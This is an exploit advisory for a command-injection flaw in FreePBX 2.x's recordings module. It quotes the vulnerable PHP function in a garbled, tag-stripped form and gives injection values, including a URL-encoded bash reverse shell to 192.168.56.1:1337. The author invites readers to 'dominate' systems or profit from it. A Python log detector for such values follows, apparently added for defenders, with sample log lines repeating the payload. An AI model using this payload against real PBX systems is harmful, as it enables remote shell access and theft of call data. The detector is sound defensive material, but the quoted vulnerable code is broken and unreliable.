App : FreePBX 2.x
Download : schmoozecom.net
Author : i-Hmx
Mail : n0p1337@gmail.com
Home : security arrays inc. , sec4ever.com , exploit4arab.net

And again, while the distro is widely used, the Schmoozecom staff are not giving it enough attention; all they provided for the distro is the fancy Schmoozecom logo and "Developed by schmoozecom". Teraraa :/

Whatever, FreePBX suffers from another command execution vuln. It is not so critical, but many people may be interested in it, as it can be used to dump plaintext data from the PBX box ;)

Vulnerable function "recording_addpage" @ admin/modules/recordings/page.recordings.php

function recording_addpage($usersnum) {
	global $fc_save;
	global $fc_check;
	global $recordings_save_path;
	?>

'; echo _("Using your phone,").""._(" dial")." ".$fc_save." "; echo _("Start speaking at the tone. Press # when finished.").""; echo _("and speak the message you wish to record. Press # when finished.")."\n"; echo '

'; } else { ?>
" tabindex="">

must be PCM Encoded, 16 Bits, at 8000Hz")?>:
" onclick="document.upload.submit(upload);alert('');" tabindex=""/>
"._("Successfully uploaded")." ".$_FILES['ivrfile']['name'].""; $rname = rtrim(basename($_FILES['ivrfile']['name'], $suffix), '.'); } ?>

"._("dial")." ".$fc_check." "._("to listen to your recording.")?>

"._("Step 2: Name").""; } ?>
:
\n"; ?> " tabindex="">
faris;fax

or, for a back connection, use

fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris

and you are ready to dominate, or even make some $$ if you are interested ;)

Have a good day
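
For defenders, one way to spot request values shaped like the two above in web server access logs. This is an added example, not part of the original advisory; the request path, the parameter name `name` and the log lines are constructed assumptions, since the advisory does not show the request itself.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Request line inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters that chain or substitute commands if a value reaches a shell.
SEPARATORS = re.compile(r"[;|&`\n]|\$\(")
# bash pseudo-device for outbound connections, seen in the advisory's value.
SOCKET_REDIRECT = "/dev/tcp/"

def suspicious_params(log_line):
    """Return (param, decoded_value, reason) tuples for one log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    findings = []
    # Split on '&' only, then decode, so an encoded %26 stays in the value.
    for pair in urlsplit(match.group(1)).query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if SOCKET_REDIRECT in value:
            findings.append((name, value, "socket-redirect"))
        elif SEPARATORS.search(value):
            findings.append((name, value, "shell-separator"))
    return findings

# Constructed sample lines; the path and parameter name are assumptions.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /admin/config.php'
    '?display=recordings&name=greeting HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:02:13 +0000] "GET /admin/config.php'
    '?display=recordings&name=faris;fax HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:02:40 +0000] "GET /admin/config.php'
    '?display=recordings&name=fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f'
    '192.168.56.1%2f1337%200%3E%261;faris HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for param, value, reason in suspicious_params(line):
            print(f"{reason}: {param}={value!r}")
```

Values are decoded before matching, so the percent-encoded form in the log is caught the same way as a raw one.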